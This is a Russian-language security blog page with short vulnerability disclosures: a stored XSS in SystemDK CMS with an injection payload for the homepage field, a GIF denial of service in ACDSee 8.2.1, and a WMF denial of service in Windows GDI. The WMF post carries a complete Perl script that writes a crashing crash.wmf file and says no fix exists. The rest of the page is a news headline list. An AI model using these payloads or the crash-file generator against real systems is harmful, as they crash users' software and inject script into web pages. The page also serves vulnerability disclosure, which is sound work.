Отказ в обслуживаний

Список блогов

Текущий блог

Войти

Регистрация

05.01.2008 00:10:32
azm: Множественные XSS в SystemDK CMS

Обнаружил вот такие косячки за SystemDK CMS.
Активные XSS:

1. http://www.systemdk.ru/dkmodules.php?...o=add_file

Активная XSS почти во всех полях: Заголовок, Описание, Имя автора, Емайл автора, Домашняя страница, Ссылка на файл. Самое удобное для внедрения скрипта поле "Домашняя страница".

)

http://"style="background:url(javascript:alert(1))/**

[URL=http://www.securityblogs.ru/index.php?act=1&id=1]Подробнее>>[/URL


Теги: Множественные XSS в SystemDK CMS	Постоянный адрес \| Просмотров: 339 \| Комментариев: 0

04.01.2008 00:19:58
azm: Отказ в обслуживании при обработке GIF в ACDSee

Удаленный пользователь может с помощью специально сформированного GIF изображения вызвать отказ в обслуживании ACDSee Viewer. Уязвимость существует из-за ошибки при обработке элемента Block Size структуры GIF Graphic Control Extension Block. Уязвима версия ACDSee 8.2.1 и более ранние.
Размер блока - Block Size в корректном gif-файле всегда равняется 4 и для меня остаётся загадкой, почему программисты из компании ACD Systems решили брать это значение из GIF файла.
Эксплоит: acdsee_dos.c


Теги: Отказ в обслуживании при обработке GIF в ACDSee	Постоянный адрес \| Просмотров: 234 \| Комментариев: 0

22.11.2007 06:37:12
azm: Подробнее о баге тут:

SecurityBlogs


Теги: http://www.securityblogs.ru/index.php?act=1&id=4	Постоянный адрес \| Просмотров: 338 \| Комментариев: 0

22.02.2007 09:04:30
azm: Отказ в обслуживаний в WMF

Удаленный пользователь может с помощью специально сформированного изображения вызвать отказ в обслуживании приложения, использующего уязвимую библиотеку.
Это происходит при отображении ESCAPE-метазаписи (фунция STARTDOC)так как, не инициализированый адреса импорта функции SeekPrinter из winspool.drv.
Уязвимыми оказываются не только приложения успользующие напрямую GDI, но и приложения использующие функции shimgvw.dll как "высокоуровневой обёртки" GDI, такие как "Программа просмотра изображений и факсов" и Windows Explorer.
Способов устранения уязвимости не существует в настоящее время.

Эксплоит:

#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by AzM";
print "\n\ngenerating crash.wmf...";
open(WMF, ">./crash.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x01\x00\x84\x43\x00\x00";
print WMF "\x00\x00\x10\x00\x00\x00\x26\x06\x0A\x00\x16\x00\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
print WMF "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "Ok\n";


	Постоянный адрес \| Просмотров: 1944 \| Комментариев: 9

Отказ в обслуживаний

Теги:
http://www.securityblogs.ru/index.php?act=1&id=4
Множественные XSS в SystemDK CMS
Отказ в обслуживании при обработке GIF в ACDSee

TOP новости

Форум

Отказ в обслуживаний

Топ-менеджер Microsoft настаивает на введении прав для пользователей Сети

Аддоны для Firefox заражены троянскими программами

Windows 7 уничтожает аккумуляторы ноутбуков

Хакеры поздравили Тимошенко с поражением

ФБР хочет следить за пользователями Интернета

Доктор Веб: Первая вирусная эпидемия 2010 года

В России Trojan.Winlock заразил миллионы компьютеров

Windows 8 может выйти в 2011 году

Суд закрыл сайт, распространяющий курительные смеси

Обнаружена уязвимость в Internet Explorer

Microsoft повысит компьютерную грамотность россиян

Американский студент исследовал файлы в торрент-сетях

Осторожно ФИШИНГ!!!

W2K8

Системный администратор Unix/Linux

sec7x24.net: Информационная безопасность 7х24

билайн жульничает?